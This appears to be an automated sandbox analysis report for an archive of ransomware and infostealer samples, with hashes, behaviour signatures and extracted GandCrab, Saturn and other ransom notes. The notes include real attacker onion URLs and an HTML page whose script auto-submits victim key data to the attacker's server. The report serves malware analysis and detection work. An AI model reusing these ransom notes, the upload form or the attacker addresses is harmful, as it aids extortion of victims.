General

  • Target

    001.rar

  • Size

    2.8MB

  • Sample

    240720-sv7qds1hqk

  • MD5

    494b1f3661964eb30145a7617315dbdb

  • SHA1

    48078350d06abe5dfeaad51e4ad6b44768df905d

  • SHA256

    9e4a9e8f9c29c2307701b66b27404fdfed5770bbcba40c05edf046e5a3285975

  • SHA512

    5e111eb302950623e595b2c3e66c472d4b74e2441e28f48127ba1e603f3f5365ba0b68062d82049bd7111b62ea74db6972d34f55fbe50de2d4e22a5ac2344a22

  • SSDEEP

    49152:nw+6eMSIzGKwOpkdWZdQvYVpy6skn+/icU/6Sjd/9DhM1WN:yfSIzfpkdWZdh7dsk+KcYBpl1sWN

Malware Config

Extracted

Path

C:\Users\RNTKH-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .RNTKH
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/e8eea44c8df4c1c
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/e8eea44c8df4c1c

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\YOEMLUCLFX-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .YOEMLUCLFX
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/754743142d13ad41
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/754743142d13ad41

Extracted

Path

C:\Users\HJZMTGUT-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .HJZMTGUT
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/36504b3a41889fc1
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/36504b3a41889fc1

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html>
<head>
<title>How can I recover my files ?</title>
<style>
html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; }
div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; }
input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; }
input[type=submit]:hover { background-color: #212121; }
a { color: #212121; text-decoration: none; font-weight: bold; }
a:hover { color: #3f51b5; text-decoration: underline; }
</style>
</head>
<body onload="submit_form()">
<div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;">
<h3>What happened to my files ?</h3>
<p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p>
<h3>What does this mean ?</h3>
<p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p>
<h3>Is it possible to recover my files ?</h3>
<p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p>
<h3>How can I get the decryptor and the private key ?</h3>
<p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p>
<p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p>
<div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;">
<form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST">
<input type="hidden" name="infection" value="[base64 blob removed]">
<noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript>
<input type="submit" value="Upload the KEY file">
</form>
</div>
<div class="box">
<p> Instructions to install Tor Browser (recommended). </p>
<hr>
<ol>
<li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li>
<li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li>
<li>Then simply open the folder and click on "Start Tor Browser".</li>
<li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/ELZYPTFV_EA184A0D95F13C0E6522DF69/</span></li>
</ol>
</div>
<div class="box">
<p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p>
<ol>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/ELZYPTFV_EA184A0D95F13C0E6522DF69/">http://lockerrwhuaf2jjx.onion.sx/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/ELZYPTFV_EA184A0D95F13C0E6522DF69/">http://lockerrwhuaf2jjx.onion.link/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/ELZYPTFV_EA184A0D95F13C0E6522DF69/">https://lockerrwhuaf2jjx.onion.rip/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/ELZYPTFV_EA184A0D95F13C0E6522DF69/">https://lockerrwhuaf2jjx.onion.to/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li>
</ol>
</div>
</div>
</body>
<script>
function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } }
</script>
</html>

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3434294380-2554721341-1919518612-1000\ESJMCGQVP-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .ESJMCGQVP
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/25c3b1d127559e6a
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/25c3b1d127559e6a

Extracted

Path

C:\$Recycle.Bin\PFPQSKAEOA-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .PFPQSKAEOA
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/a2bb8533ce2582a4
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/a2bb8533ce2582a4

Extracted

Path

C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\#DECRYPT_MY_FILES#.html

Ransom Note
<html>
<title>S A T U R N</title>
<center>
<body>
<h1>S A T U R N</h1>
<h4>Your documents, photos, databases, and other important files have been encrypted!</h4>
<br />
To Decrypt your files follow these instructions:
<br />
<div>
<h4>1. Download and Install Tor Browser from <a href=https://www.torproject.org/>https://www.torproject.org/</a></h4>
<br />
<h4>2. Run the browser</h4>
<br />
<h4>3. In the Tor Browser, open website:</h3>
<div style="background-color: #d9d9d9; margin-left: 20px; margin-right: 20px; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px;"> </a><b>http://su34pwhpcafeiztt.onion</b><br/> </div>
<h4>4. Follow the instructions at this website</h4>
</div>
</body>
</center>
</html>
<style> html { background-color: white; font-family: Helvetica, sans-serif; } div { background-color: #f2f2f2; width: 80: %; padding: 25px; margin: 25px; overflow:hidden; } </style>

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html>
<head>
<title>How can I recover my files ?</title>
<style>
html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; }
div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; }
input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; }
input[type=submit]:hover { background-color: #212121; }
a { color: #212121; text-decoration: none; font-weight: bold; }
a:hover { color: #3f51b5; text-decoration: underline; }
</style>
</head>
<body onload="submit_form()">
<div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;">
<h3>What happened to my files ?</h3>
<p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p>
<h3>What does this mean ?</h3>
<p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p>
<h3>Is it possible to recover my files ?</h3>
<p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p>
<h3>How can I get the decryptor and the private key ?</h3>
<p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p>
<p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p>
<div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;">
<form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST">
<input type="hidden" name="infection" value="[base64 blob removed]">
<noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript>
<input type="submit" value="Upload the KEY file">
</form>
</div>
<div class="box">
<p> Instructions to install Tor Browser (recommended). </p>
<hr>
<ol>
<li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li>
<li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li>
<li>Then simply open the folder and click on "Start Tor Browser".</li>
<li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</span></li>
</ol>
</div>
<div class="box">
<p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p>
<ol>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">http://lockerrwhuaf2jjx.onion.sx/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">http://lockerrwhuaf2jjx.onion.link/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">https://lockerrwhuaf2jjx.onion.rip/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">https://lockerrwhuaf2jjx.onion.to/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li>
</ol>
</div>
</div>
</body>
<script>
function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } }
</script>
</html>

Extracted

Path

C:\$Recycle.Bin\WOBTRC-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .WOBTRC
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/b2129ec222655a45
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/b2129ec222655a45

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3434294380-2554721341-1919518612-1000\MORVALFM-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention!
All your files, documents, photos, databases and other important files are encrypted and have the extension: .MORVALFM
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
| 0. Download Tor browser - https://www.torproject.org/
| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/756f5b77f51355cc
| 4. Follow the instructions on this page
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
[base64 blob removed]
---END GANDCRAB KEY---
---BEGIN PC DATA---
[base64 blob removed]
---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/756f5b77f51355cc

Targets

    • Target

      0ddef96bc1cd9fae381e6f228639c145341e10197cc690a70dc0c8acb46d4c2c.exe

    • Size

      278KB

    • MD5

      09180c7dccacffdf04ab67cf8909b5f2

    • SHA1

      ebcd05145f771a48ba3f50bcef46121344817575

    • SHA256

      0ddef96bc1cd9fae381e6f228639c145341e10197cc690a70dc0c8acb46d4c2c

    • SHA512

      5f90272144c53b30d61635bd9d7c4eaeb442282361d00f8183cbf3319a74202f357e593f6a0e522b214b836509332affcf142b31684b5807e114c88b5cb16c4e

    • SSDEEP

      3072:+TDshiWfaoizdfUICi9IyFiD2vEOAaZ/xr+VBFaI1YIYiheeeeeeeeefYDeOiClE:tfaDzdg0IsAwZrMBgkSOG9iO2RK

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      11a80b997519711f00a741dcf64788fb99554061a4798509ca55ea4e11957eb1.exe

    • Size

      36KB

    • MD5

      b7122a5e603f633bea652729f79b46f1

    • SHA1

      1f7f13d4e5a835a5164b4d5e2decd253fe38e340

    • SHA256

      11a80b997519711f00a741dcf64788fb99554061a4798509ca55ea4e11957eb1

    • SHA512

      f2e34136dfa31c9b7507543306a632ff83480cbbc65b28fe7167aacce6f2fb21b89be837affee9b82def6fe4fccba414ca4af39c968cd456d3102f8cbc36a816

    • SSDEEP

      768:LzM32Zl0l3KLcHPg+RjNAJcsELn/bi2wMlk9aubgIgj0mqew:LSQw/jxP7MTzYrqew

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      13507f1f60e81e3fcfc2244f5b9e4f5d9d04c6f0beaa34429879afdb24720c07.exe

    • Size

      255KB

    • MD5

      e4611c388a33ccd1a7d3d4a996e32fa3

    • SHA1

      61c206f323eeb960873f5d9728011b774075c01a

    • SHA256

      13507f1f60e81e3fcfc2244f5b9e4f5d9d04c6f0beaa34429879afdb24720c07

    • SHA512

      596630e87eca6aa87a5861a77f21eb9cecf82add1c5d02a27c36b0ec22f8c770e2cd81b240a3db14ea59c09389360e2a1aaf5e28ab5627e8714f0cfef8dddce0

    • SSDEEP

      6144:vcOUIh8dlf/I2K7OQp/ymns6U7b3CN0lo3On:08h8rHI2K7jp/UXSNb+n

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (287) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      1c53d9fda466a35e127ea0f774d776595ac99f837e0b9fd79ef288859e0a82dc.exe

    • Size

      46KB

    • MD5

      d1cb2d7ca5643dca3f7143ef440209f4

    • SHA1

      55746c8664c60bd78a730a2421e0ec4b3bc424b3

    • SHA256

      1c53d9fda466a35e127ea0f774d776595ac99f837e0b9fd79ef288859e0a82dc

    • SHA512

      abd18bb118590e46c26c9518a6c6b7acf240e5652c0cac6cc5d8a6c0d8c4143c0fff634e95b29c604524d71cec81c97cc411bae33c029037621ccc41591d225e

    • SSDEEP

      768:xBiSJXLnGKOGqvrFKrfJx860qT/b3rk+5CibTx5b/IREKbSrVMmijabyrHehx+BM:xRgxvhKrf38KT/bgoTx5seKbSxWa0ccm

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      3ae9ec7dc2a13da4eb7ca8467ac659f75bf4dbef45fc13ff63011685c335bde0.exe

    • Size

      43KB

    • MD5

      0d7f21d96c832bee780168489799888a

    • SHA1

      d916ffc55be542fca048ef13a9ec3bef3c70d464

    • SHA256

      3ae9ec7dc2a13da4eb7ca8467ac659f75bf4dbef45fc13ff63011685c335bde0

    • SHA512

      4a59e60a20f15260def46fed3d4ee70b04e830643348c3018f715caf43659e956e920f5cd9adce55d2495e5fa47f192219052f1b13e13853ddf5e0e2749ecf50

    • SSDEEP

      768:jI2Er0ofK5/lQ0YSHiZka7NgpNGYzsUSy9PlQ1b3tqDDiNeH4jx9rHcKHL4R:jIL4ofg/lTYSHSMPdYTyCzx9FHL

    Score
    3/10
    • Target

      41ad73fa68a66ac06fe2d12e35dc537a8f5c8ec534a0a82d13f2769f6bb43bf5.exe

    • Size

      45KB

    • MD5

      9f7fa29d1f74d761991dac02be8b46bc

    • SHA1

      e3865acf369a4f118a97169a957c820f94db515e

    • SHA256

      41ad73fa68a66ac06fe2d12e35dc537a8f5c8ec534a0a82d13f2769f6bb43bf5

    • SHA512

      7e78f4514e50b68cbc19a3e40543a7929b4da338c8fbccae7d43fc1082285a06c4708bc9ea4d4aa32906ebb8a3df9bbfbe441b48477d64c77896fd6a0e17440e

    • SSDEEP

      768:8p+cLlu75U5xC/4VBzVdmd7kPHXvqPG+t2u3juYoxguzmQxyMMi0:8jlu75U5QAXrmdNPx4u6Yox/hEMMi0

    Score
    7/10
    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312.exe

    • Size

      224KB

    • MD5

      c49902c175154630349cc10a9eda0363

    • SHA1

      7074240b4abd8e8eac3e0d405630b4ab10e5a744

    • SHA256

      42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312

    • SHA512

      f004185e7cb730b991e19b75e33a84ae2b903c1c4c1a1dc7b1c8bb7e64befa6cc80048a4c73a7cb25450da4a95eff6652e19ff17f80f0e1e3eb99069bf474820

    • SSDEEP

      3072:tPokaghmM6wQ+ks8Bv/ESCGmYSfKpmC9tPozIx/tAg0FujtBy9kVV8av:ui4MqhBnESCGmrK7NtAOqGIav

    • Renames multiple (137) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      46d2ba1c63ad30cc0f8952ad248ad7f53382ad7e61df145b7c422c3ac1d111b4.exe

    • Size

      12KB

    • MD5

      095ae02d1a70dbabccd47bd0d0a706eb

    • SHA1

      020c8440d7d1dbd8fc415fbce40191ac195c0e6c

    • SHA256

      46d2ba1c63ad30cc0f8952ad248ad7f53382ad7e61df145b7c422c3ac1d111b4

    • SHA512

      8b74f8bd1ec052df05b92145d2bb447194974b2ac0a9d68e7d3e026d2e902cbc9ec4080b72d67fb3911cce4d8c23814bc26d8e07a800c3e1dfdd3f5fcaf3a7c9

    • SSDEEP

      192:FSRoff34J4cvAWyjx4cL9rd83Miy4lzknkrwzZrAU/i8stYcFOKc03KY:FSKa7wd4w4+avUZrv/iptYcFOKc03K

    • Renames multiple (73) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Target

      49bac3903d2a9fd2ce742c35f8d9804061616874cf9e1a94dfd5007e25a3ca3e.exe

    • Size

      80KB

    • MD5

      e6e6dbeb428a08f36853e0859c0d6710

    • SHA1

      48201ffc1525b8b93c8a624f66c09cbb51575301

    • SHA256

      49bac3903d2a9fd2ce742c35f8d9804061616874cf9e1a94dfd5007e25a3ca3e

    • SHA512

      e38a97d60da1ead834e95165e30771217da7682871e4596a0ec42598cc6172357d5b3832267a5d84e52cdad59fcf9df1e042299e58a48a78f4708f3a08482901

    • SSDEEP

      1536:gwGBY/Hnnd3gAd9JND4/dqDoCL92SVmf9m2dSEKuT2PRB6:gwUGHnndQAda/sD90SuVSEKuqJB6

    Score
    1/10
    • Target

      4ffbdd03f2424c3013aac4b0cb5eb49a991f89a2533a24f56f47c1a82819c575.exe

    • Size

      171KB

    • MD5

      93cb86dedb2c4a4fa472e47600e85874

    • SHA1

      7462638a800fdd18a0614172c582aebd47a91253

    • SHA256

      4ffbdd03f2424c3013aac4b0cb5eb49a991f89a2533a24f56f47c1a82819c575

    • SHA512

      e5ae4e0806907651c6fd2bdc7703e177d0b89ecf494151d18076db062e1f60b4d2241e921be08704273dcf1d9e42135dc459a681c01592ed73c7c84d8bbddf87

    • SSDEEP

      3072:mmyqA/BIkrL0kMZ2m7ksIS/bOpd5sF2Fj3YyP:lQ/BIkf0V27sFbONsF2Fjx

    • Gandcrab

      Gandcrab is a Trojan horse that encrypts files on a computer.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (274) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Sets desktop wallpaper using registry

    • Target

      55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70.exe

    • Size

      138KB

    • MD5

      681211a7b964eaffd13e0610d82a25e7

    • SHA1

      62a4a462c4535ef21411d29c9d8273cbe2fbc2fa

    • SHA256

      55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70

    • SHA512

      17c0edafc5c652841d684eb9ec5909ff1b0b47a0c04bd689a81cf03ade9e0efa077170a2c64f3c993f548838276d86774b73922b9484c1d22d182e41c5a02e8e

    • SSDEEP

      3072:vDaz8uS5prazAw8JN1SJFkuh2z5lWmd4ox33:OySAUh6hd4ox

    • Renames multiple (122) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      63feec522666cd97ec0a253cc17cf629a7bdb096c04f0b2de4c1bf959d67a77d.exe

    • Size

      273KB

    • MD5

      320dd92ca62a321d2ac4539f105aa286

    • SHA1

      f46e943bf9e8609167656d5f26b4bdf80019b016

    • SHA256

      63feec522666cd97ec0a253cc17cf629a7bdb096c04f0b2de4c1bf959d67a77d

    • SHA512

